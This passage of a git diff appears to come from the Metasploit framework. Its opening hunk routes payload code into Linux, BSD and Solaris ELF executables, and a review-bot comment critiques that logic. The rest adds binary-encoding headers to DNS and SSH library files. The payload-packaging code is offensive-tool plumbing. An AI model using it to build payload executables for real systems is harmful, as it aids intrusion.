+ output = Msf::Util::EXE.to_linux_x86_elf(framework, code, exeopts)
+ elsif (arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
+ output = Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
+ end
+ elsif(plat and (plat.index(Msf::Module::Platform::BSD)))
+ if (not arch or (arch.index(ARCH_X86)))
+ output = Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts)
+ end
+ elsif(plat and (plat.index(Msf::Module::Platform::Solaris)))
+ if (not arch or (arch.index(ARCH_X86)))
+ output = Msf::Util::EXE.to_solaris_x86_elf(framework, code, exeopts)
+ end
end
when 'macho'
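Review bot: In the rewritten `when 'elf'` arm, `output` is never assigned when `plat` names something other than Linux, BSD or Solaris, or when BSD or Solaris is paired with a non-x86 `arch`, and no `else` reports it. How an unset `output` is handled lies outside this hunk, so a final `else` that raises or logs the unsupported platform/architecture pair would surface the failure where it originates. The Linux arm also changes behaviour: the two independent `if`s became `if`/`elsif`, so an `arch` list containing both x86 and x64 now yields the x86 result where the old code ended with the x64 one. A one-line comment stating which precedence is intended would settle that. The enclosing method starts outside the hunk.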
diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb
index ac41372ae4..ed084d9825 100644
--- a/lib/msf/util/svn.rb
+++ b/lib/msf/util/svn.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-util-svn
diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb
index 12bcdec3ea..94053f8e52 100644
--- a/lib/msf/windows_error.rb
+++ b/lib/msf/windows_error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/net/dns.rb b/lib/net/dns.rb
index 7b24483e98..3a7dddb7a0 100644
--- a/lib/net/dns.rb
+++ b/lib/net/dns.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require "net/dns/resolver"
diff --git a/lib/net/dns/dns.rb b/lib/net/dns/dns.rb
index 1214ea5bac..bb1bb05b8f 100644
--- a/lib/net/dns/dns.rb
+++ b/lib/net/dns/dns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# dns.rb
diff --git a/lib/net/dns/header.rb b/lib/net/dns/header.rb
index f927da8b76..66279c2f7e 100644
--- a/lib/net/dns/header.rb
+++ b/lib/net/dns/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#---
# $Id: Header.rb,v 1.5 2006/07/30 16:54:28 bluemonk Exp $
#+++
diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb
index 01937d0215..d65c8bf293 100644
--- a/lib/net/dns/names/names.rb
+++ b/lib/net/dns/names/names.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/dns/packet.rb b/lib/net/dns/packet.rb
index 280d3fecca..5938d252d4 100644
--- a/lib/net/dns/packet.rb
+++ b/lib/net/dns/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'logger'
require 'net/dns/names/names'
require 'net/dns/dns'
diff --git a/lib/net/dns/question.rb b/lib/net/dns/question.rb
index 9eb6158535..fb43e8af9b 100644
--- a/lib/net/dns/question.rb
+++ b/lib/net/dns/question.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#---
# $Id: Question.rb,v 1.8 2006/07/28 19:00:03 bluemonk Exp $
#+++
diff --git a/lib/net/dns/resolver.rb b/lib/net/dns/resolver.rb
index 402b7df173..6afb96489e 100644
--- a/lib/net/dns/resolver.rb
+++ b/lib/net/dns/resolver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# $Id: Resolver.rb,v 1.11 2006/07/30 16:55:35 bluemonk Exp $
#
diff --git a/lib/net/dns/resolver/socks.rb b/lib/net/dns/resolver/socks.rb
index e3d1edd373..35160e0bfd 100644
--- a/lib/net/dns/resolver/socks.rb
+++ b/lib/net/dns/resolver/socks.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'socket'
require 'ipaddr'
diff --git a/lib/net/dns/resolver/timeouts.rb b/lib/net/dns/resolver/timeouts.rb
index e0b4f1942a..e7523e478f 100644
--- a/lib/net/dns/resolver/timeouts.rb
+++ b/lib/net/dns/resolver/timeouts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
module SecondsHandle #:nodoc: all
diff --git a/lib/net/dns/rr.rb b/lib/net/dns/rr.rb
index e2d31ba1c8..1629c3f3a7 100644
--- a/lib/net/dns/rr.rb
+++ b/lib/net/dns/rr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# $Id: RR.rb,v 1.19 2006/07/28 07:33:36 bluemonk Exp $
#
diff --git a/lib/net/dns/rr/a.rb b/lib/net/dns/rr/a.rb
index 6481e0cba9..465ad45071 100644
--- a/lib/net/dns/rr/a.rb
+++ b/lib/net/dns/rr/a.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::A
diff --git a/lib/net/dns/rr/aaaa.rb b/lib/net/dns/rr/aaaa.rb
index 7f9d7486f9..7fc12ca1a6 100644
--- a/lib/net/dns/rr/aaaa.rb
+++ b/lib/net/dns/rr/aaaa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::AAAA
diff --git a/lib/net/dns/rr/classes.rb b/lib/net/dns/rr/classes.rb
index 25fd0c0486..9eb5ce478c 100644
--- a/lib/net/dns/rr/classes.rb
+++ b/lib/net/dns/rr/classes.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/dns/rr/cname.rb b/lib/net/dns/rr/cname.rb
index 12b9a1b655..63edeeb167 100644
--- a/lib/net/dns/rr/cname.rb
+++ b/lib/net/dns/rr/cname.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::CNAME
diff --git a/lib/net/dns/rr/hinfo.rb b/lib/net/dns/rr/hinfo.rb
index 6c8d080762..4de7f22524 100644
--- a/lib/net/dns/rr/hinfo.rb
+++ b/lib/net/dns/rr/hinfo.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::HINFO
diff --git a/lib/net/dns/rr/mr.rb b/lib/net/dns/rr/mr.rb
index f7abecf211..ccb5bbad3e 100644
--- a/lib/net/dns/rr/mr.rb
+++ b/lib/net/dns/rr/mr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::MR
diff --git a/lib/net/dns/rr/mx.rb b/lib/net/dns/rr/mx.rb
index 20f703dcc0..2463b5eb37 100644
--- a/lib/net/dns/rr/mx.rb
+++ b/lib/net/dns/rr/mx.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::MX
diff --git a/lib/net/dns/rr/ns.rb b/lib/net/dns/rr/ns.rb
index 253d6bb2f6..8be5079b03 100644
--- a/lib/net/dns/rr/ns.rb
+++ b/lib/net/dns/rr/ns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::NS
diff --git a/lib/net/dns/rr/null.rb b/lib/net/dns/rr/null.rb
index 9890270d42..55a1574446 100644
--- a/lib/net/dns/rr/null.rb
+++ b/lib/net/dns/rr/null.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::NULL
diff --git a/lib/net/dns/rr/ptr.rb b/lib/net/dns/rr/ptr.rb
index f7e1787d82..694fea3297 100644
--- a/lib/net/dns/rr/ptr.rb
+++ b/lib/net/dns/rr/ptr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::PTR
diff --git a/lib/net/dns/rr/soa.rb b/lib/net/dns/rr/soa.rb
index b67344afcb..62b15c9e9e 100644
--- a/lib/net/dns/rr/soa.rb
+++ b/lib/net/dns/rr/soa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::SOA
diff --git a/lib/net/dns/rr/srv.rb b/lib/net/dns/rr/srv.rb
index 35f2c2e737..41fe16c447 100644
--- a/lib/net/dns/rr/srv.rb
+++ b/lib/net/dns/rr/srv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::SRV
diff --git a/lib/net/dns/rr/txt.rb b/lib/net/dns/rr/txt.rb
index cbad5292c8..e2f6e1e84b 100644
--- a/lib/net/dns/rr/txt.rb
+++ b/lib/net/dns/rr/txt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::TXT
diff --git a/lib/net/dns/rr/types.rb b/lib/net/dns/rr/types.rb
index 57f19a894e..cde8bb3632 100644
--- a/lib/net/dns/rr/types.rb
+++ b/lib/net/dns/rr/types.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/ssh.rb b/lib/net/ssh.rb
index e6fc134ce1..2c98142cf4 100644
--- a/lib/net/ssh.rb
+++ b/lib/net/ssh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
# Make sure HOME is set, regardless of OS, so that File.expand_path works
diff --git a/lib/net/ssh.rb.ut.rb b/lib/net/ssh.rb.ut.rb
index 2cc9c338c2..e3884e81a9 100755
--- a/lib/net/ssh.rb.ut.rb
+++ b/lib/net/ssh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'net/ssh'
diff --git a/lib/net/ssh/authentication/agent.rb b/lib/net/ssh/authentication/agent.rb
index a30279a8a1..8193991437 100644
--- a/lib/net/ssh/authentication/agent.rb
+++ b/lib/net/ssh/authentication/agent.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/constants.rb b/lib/net/ssh/authentication/constants.rb
index 067e9cd44f..387c78fca7 100644
--- a/lib/net/ssh/authentication/constants.rb
+++ b/lib/net/ssh/authentication/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Authentication
# Describes the constants used by the Net::SSH::Authentication components
diff --git a/lib/net/ssh/authentication/key_manager.rb b/lib/net/ssh/authentication/key_manager.rb
index eba17cfc76..6e3541c7d5 100644
--- a/lib/net/ssh/authentication/key_manager.rb
+++ b/lib/net/ssh/authentication/key_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/key_factory'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/methods/abstract.rb b/lib/net/ssh/authentication/methods/abstract.rb
index 34f2ffe6a8..794d75bf2d 100644
--- a/lib/net/ssh/authentication/methods/abstract.rb
+++ b/lib/net/ssh/authentication/methods/abstract.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/methods/hostbased.rb b/lib/net/ssh/authentication/methods/hostbased.rb
index 43c3eac8fb..908fe179ea 100644
--- a/lib/net/ssh/authentication/methods/hostbased.rb
+++ b/lib/net/ssh/authentication/methods/hostbased.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/authentication/methods/abstract'
module Net
diff --git a/lib/net/ssh/authentication/methods/keyboard_interactive.rb b/lib/net/ssh/authentication/methods/keyboard_interactive.rb
index 47864ca378..073edc1538 100644
--- a/lib/net/ssh/authentication/methods/keyboard_interactive.rb
+++ b/lib/net/ssh/authentication/methods/keyboard_interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/prompt'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/methods/password.rb b/lib/net/ssh/authentication/methods/password.rb
index ade4695e72..a04e1c8563 100644
--- a/lib/net/ssh/authentication/methods/password.rb
+++ b/lib/net/ssh/authentication/methods/password.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/methods/publickey.rb b/lib/net/ssh/authentication/methods/publickey.rb
index e5eafebbba..8bb47a4adf 100644
--- a/lib/net/ssh/authentication/methods/publickey.rb
+++ b/lib/net/ssh/authentication/methods/publickey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/pageant.rb b/lib/net/ssh/authentication/pageant.rb
index 871e86b1c1..4ff4d93ca7 100644
--- a/lib/net/ssh/authentication/pageant.rb
+++ b/lib/net/ssh/authentication/pageant.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'dl/import'
require 'dl/struct'
diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb
index b471b54377..0df46444b8 100644
--- a/lib/net/ssh/authentication/session.rb
+++ b/lib/net/ssh/authentication/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/transport/constants'
require 'net/ssh/authentication/constants'
diff --git a/lib/net/ssh/buffer.rb b/lib/net/ssh/buffer.rb
index d74244b219..9c6a199a68 100644
--- a/lib/net/ssh/buffer.rb
+++ b/lib/net/ssh/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/ruby_compat'
require 'net/ssh/transport/openssl'
diff --git a/lib/net/ssh/buffered_io.rb b/lib/net/ssh/buffered_io.rb
index c92db678c5..c51e775de7 100644
--- a/lib/net/ssh/buffered_io.rb
+++ b/lib/net/ssh/buffered_io.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb
index f749b1e809..6514744111 100644
--- a/lib/net/ssh/command_stream.rb
+++ b/lib/net/ssh/command_stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
module Net
diff --git a/lib/net/ssh/config.rb b/lib/net/ssh/config.rb
index 27ebb19bcc..c518cf1b98 100644
--- a/lib/net/ssh/config.rb
+++ b/lib/net/ssh/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# The Net::SSH::Config class is used to parse OpenSSH configuration files,
diff --git a/lib/net/ssh/connection/channel.rb b/lib/net/ssh/connection/channel.rb
index 6bf7434158..cd6044fad9 100644
--- a/lib/net/ssh/connection/channel.rb
+++ b/lib/net/ssh/connection/channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/connection/constants'
require 'net/ssh/connection/term'
diff --git a/lib/net/ssh/connection/constants.rb b/lib/net/ssh/connection/constants.rb
index 0b7711806b..fa23803feb 100644
--- a/lib/net/ssh/connection/constants.rb
+++ b/lib/net/ssh/connection/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Connection
# Definitions of constants that are specific to the connection layer of the
diff --git a/lib/net/ssh/connection/session.rb b/lib/net/ssh/connection/session.rb
index 93c2e2b49e..d63a77ae58 100644
--- a/lib/net/ssh/connection/session.rb
+++ b/lib/net/ssh/connection/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/connection/channel'
require 'net/ssh/connection/constants'
diff --git a/lib/net/ssh/connection/term.rb b/lib/net/ssh/connection/term.rb
index 3e1caa5d0c..efecea7124 100644
--- a/lib/net/ssh/connection/term.rb
+++ b/lib/net/ssh/connection/term.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Connection
# These constants are used when requesting a pseudo-terminal (via
diff --git a/lib/net/ssh/errors.rb b/lib/net/ssh/errors.rb
index 219be404c6..009f896ea3 100644
--- a/lib/net/ssh/errors.rb
+++ b/lib/net/ssh/errors.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A general exception class, to act as the ancestor of all other Net::SSH
# exception classes.
diff --git a/lib/net/ssh/key_factory.rb b/lib/net/ssh/key_factory.rb
index 6c2f1c3841..e416e622c6 100644
--- a/lib/net/ssh/key_factory.rb
+++ b/lib/net/ssh/key_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/openssl'
require 'net/ssh/prompt'
diff --git a/lib/net/ssh/known_hosts.rb b/lib/net/ssh/known_hosts.rb
index 3722745c12..4e251aa319 100644
--- a/lib/net/ssh/known_hosts.rb
+++ b/lib/net/ssh/known_hosts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'strscan'
require 'net/ssh/buffer'
diff --git a/lib/net/ssh/loggable.rb b/lib/net/ssh/loggable.rb
index a1de96a976..4acf8b6edd 100644
--- a/lib/net/ssh/loggable.rb
+++ b/lib/net/ssh/loggable.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A simple module to make logging easier to deal with. It assumes that the
diff --git a/lib/net/ssh/packet.rb b/lib/net/ssh/packet.rb
index a54c00530c..54b3d477ff 100644
--- a/lib/net/ssh/packet.rb
+++ b/lib/net/ssh/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/transport/constants'
require 'net/ssh/authentication/constants'
diff --git a/lib/net/ssh/prompt.rb b/lib/net/ssh/prompt.rb
index 8ca2a12e8e..abf0409333 100644
--- a/lib/net/ssh/prompt.rb
+++ b/lib/net/ssh/prompt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A basic prompt module that can be mixed into other objects. If HighLine is
diff --git a/lib/net/ssh/proxy/errors.rb b/lib/net/ssh/proxy/errors.rb
index 6eb3501a93..7decc82596 100644
--- a/lib/net/ssh/proxy/errors.rb
+++ b/lib/net/ssh/proxy/errors.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
module Net; module SSH; module Proxy
diff --git a/lib/net/ssh/proxy/http.rb b/lib/net/ssh/proxy/http.rb
index 1131601870..f36727c28e 100644
--- a/lib/net/ssh/proxy/http.rb
+++ b/lib/net/ssh/proxy/http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'net/ssh/proxy/errors'
diff --git a/lib/net/ssh/proxy/socks4.rb b/lib/net/ssh/proxy/socks4.rb
index ec04f84054..4dd2fd0794 100644
--- a/lib/net/ssh/proxy/socks4.rb
+++ b/lib/net/ssh/proxy/socks4.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'resolv'
require 'ipaddr'
diff --git a/lib/net/ssh/proxy/socks5.rb b/lib/net/ssh/proxy/socks5.rb
index 1c9b4a6491..adb0ae0efa 100644
--- a/lib/net/ssh/proxy/socks5.rb
+++ b/lib/net/ssh/proxy/socks5.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'net/ssh/ruby_compat'
require 'net/ssh/proxy/errors'
diff --git a/lib/net/ssh/ruby_compat.rb b/lib/net/ssh/ruby_compat.rb
index 90a96470cc..a1092f1d65 100644
--- a/lib/net/ssh/ruby_compat.rb
+++ b/lib/net/ssh/ruby_compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class String
if RUBY_VERSION < "1.9"
def getbyte(index)
diff --git a/lib/net/ssh/service/forward.rb b/lib/net/ssh/service/forward.rb
index 234c358668..52e87efea3 100644
--- a/lib/net/ssh/service/forward.rb
+++ b/lib/net/ssh/service/forward.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
module Net; module SSH; module Service
diff --git a/lib/net/ssh/test.rb b/lib/net/ssh/test.rb
index be76150c8f..11cfd31aac 100644
--- a/lib/net/ssh/test.rb
+++ b/lib/net/ssh/test.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/session'
require 'net/ssh/connection/session'
require 'net/ssh/test/kex'
diff --git a/lib/net/ssh/test/channel.rb b/lib/net/ssh/test/channel.rb
index 5efbe8b489..8483550628 100644
--- a/lib/net/ssh/test/channel.rb
+++ b/lib/net/ssh/test/channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Test
# A mock channel, used for scripting actions in tests. It wraps a
diff --git a/lib/net/ssh/test/extensions.rb b/lib/net/ssh/test/extensions.rb
index e19a986369..af085af2d0 100644
--- a/lib/net/ssh/test/extensions.rb
+++ b/lib/net/ssh/test/extensions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/packet'
require 'net/ssh/buffered_io'
diff --git a/lib/net/ssh/test/kex.rb b/lib/net/ssh/test/kex.rb
index 9e34e42c47..bdef643fd8 100644
--- a/lib/net/ssh/test/kex.rb
+++ b/lib/net/ssh/test/kex.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/errors'
diff --git a/lib/net/ssh/test/local_packet.rb b/lib/net/ssh/test/local_packet.rb
index a2ef470270..b1555527cc 100644
--- a/lib/net/ssh/test/local_packet.rb
+++ b/lib/net/ssh/test/local_packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/packet'
require 'net/ssh/test/packet'
diff --git a/lib/net/ssh/test/packet.rb b/lib/net/ssh/test/packet.rb
index 7b838a64ad..c3eeff9030 100644
--- a/lib/net/ssh/test/packet.rb
+++ b/lib/net/ssh/test/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/connection/constants'
require 'net/ssh/transport/constants'
diff --git a/lib/net/ssh/test/remote_packet.rb b/lib/net/ssh/test/remote_packet.rb
index cd89b22b27..844d4ac6fd 100644
--- a/lib/net/ssh/test/remote_packet.rb
+++ b/lib/net/ssh/test/remote_packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/test/packet'
diff --git a/lib/net/ssh/test/script.rb b/lib/net/ssh/test/script.rb
index 58796ccdaf..6fec8930f8 100644
--- a/lib/net/ssh/test/script.rb
+++ b/lib/net/ssh/test/script.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/test/channel'
require 'net/ssh/test/local_packet'
require 'net/ssh/test/remote_packet'
diff --git a/lib/net/ssh/test/socket.rb b/lib/net/ssh/test/socket.rb
index 62a26dbfcb..5356731d4f 100644
--- a/lib/net/ssh/test/socket.rb
+++ b/lib/net/ssh/test/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'stringio'
require 'net/ssh/test/extensions'
diff --git a/lib/net/ssh/transport/algorithms.rb b/lib/net/ssh/transport/algorithms.rb
index ecf39fdaa0..cef241f6ca 100644
--- a/lib/net/ssh/transport/algorithms.rb
+++ b/lib/net/ssh/transport/algorithms.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/known_hosts'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/transport/cipher_factory.rb b/lib/net/ssh/transport/cipher_factory.rb
index fc648291a5..2946aa0314 100644
--- a/lib/net/ssh/transport/cipher_factory.rb
+++ b/lib/net/ssh/transport/cipher_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/transport/identity_cipher'
diff --git a/lib/net/ssh/transport/constants.rb b/lib/net/ssh/transport/constants.rb
index 23c2859a1b..ba450dd98a 100644
--- a/lib/net/ssh/transport/constants.rb
+++ b/lib/net/ssh/transport/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Transport
module Constants
diff --git a/lib/net/ssh/transport/hmac.rb b/lib/net/ssh/transport/hmac.rb
index e57924cfd7..9721475ba6 100644
--- a/lib/net/ssh/transport/hmac.rb
+++ b/lib/net/ssh/transport/hmac.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/md5'
require 'net/ssh/transport/hmac/md5_96'
require 'net/ssh/transport/hmac/sha1'
diff --git a/lib/net/ssh/transport/hmac/abstract.rb b/lib/net/ssh/transport/hmac/abstract.rb
index cfbb33795e..1020070394 100644
--- a/lib/net/ssh/transport/hmac/abstract.rb
+++ b/lib/net/ssh/transport/hmac/abstract.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
module Net; module SSH; module Transport; module HMAC
diff --git a/lib/net/ssh/transport/hmac/md5.rb b/lib/net/ssh/transport/hmac/md5.rb
index 66b78ca42e..59bd034846 100644
--- a/lib/net/ssh/transport/hmac/md5.rb
+++ b/lib/net/ssh/transport/hmac/md5.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/md5_96.rb b/lib/net/ssh/transport/hmac/md5_96.rb
index 826b70a0d0..8759b70ff0 100644
--- a/lib/net/ssh/transport/hmac/md5_96.rb
+++ b/lib/net/ssh/transport/hmac/md5_96.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/md5'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/none.rb b/lib/net/ssh/transport/hmac/none.rb
index 191373e873..cad4af51c1 100644
--- a/lib/net/ssh/transport/hmac/none.rb
+++ b/lib/net/ssh/transport/hmac/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/sha1.rb b/lib/net/ssh/transport/hmac/sha1.rb
index b40d32fe91..d1fdecc7a5 100644
--- a/lib/net/ssh/transport/hmac/sha1.rb
+++ b/lib/net/ssh/transport/hmac/sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/sha1_96.rb b/lib/net/ssh/transport/hmac/sha1_96.rb
index 6b0b3c282e..d04e2e20e9 100644
--- a/lib/net/ssh/transport/hmac/sha1_96.rb
+++ b/lib/net/ssh/transport/hmac/sha1_96.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/sha1'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/identity_cipher.rb b/lib/net/ssh/transport/identity_cipher.rb
index 856c2ed667..0a0b4034a5 100644
--- a/lib/net/ssh/transport/identity_cipher.rb
+++ b/lib/net/ssh/transport/identity_cipher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Transport
# A cipher that does nothing but pass the data through, unchanged. This
diff --git a/lib/net/ssh/transport/kex.rb b/lib/net/ssh/transport/kex.rb
index b38a46f27b..23f55df9c7 100644
--- a/lib/net/ssh/transport/kex.rb
+++ b/lib/net/ssh/transport/kex.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/kex/diffie_hellman_group1_sha1'
require 'net/ssh/transport/kex/diffie_hellman_group_exchange_sha1'
diff --git a/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb b/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
index a9875ac495..2ea524d0b4 100644
--- a/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
+++ b/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb b/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
index bf12863afb..0764304279 100644
--- a/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
+++ b/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/transport/constants'
require 'net/ssh/transport/kex/diffie_hellman_group1_sha1'
diff --git a/lib/net/ssh/transport/openssl.rb b/lib/net/ssh/transport/openssl.rb
index 03036ec95c..cd07e41c67 100644
--- a/lib/net/ssh/transport/openssl.rb
+++ b/lib/net/ssh/transport/openssl.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/buffer'
diff --git a/lib/net/ssh/transport/packet_stream.rb b/lib/net/ssh/transport/packet_stream.rb
index 9c18768bf0..39f593c470 100644
--- a/lib/net/ssh/transport/packet_stream.rb
+++ b/lib/net/ssh/transport/packet_stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffered_io'
require 'net/ssh/errors'
require 'net/ssh/packet'
diff --git a/lib/net/ssh/transport/server_version.rb b/lib/net/ssh/transport/server_version.rb
index 02b0d9cc8a..4d96c16f44 100644
--- a/lib/net/ssh/transport/server_version.rb
+++ b/lib/net/ssh/transport/server_version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/loggable'
require 'net/ssh/version'
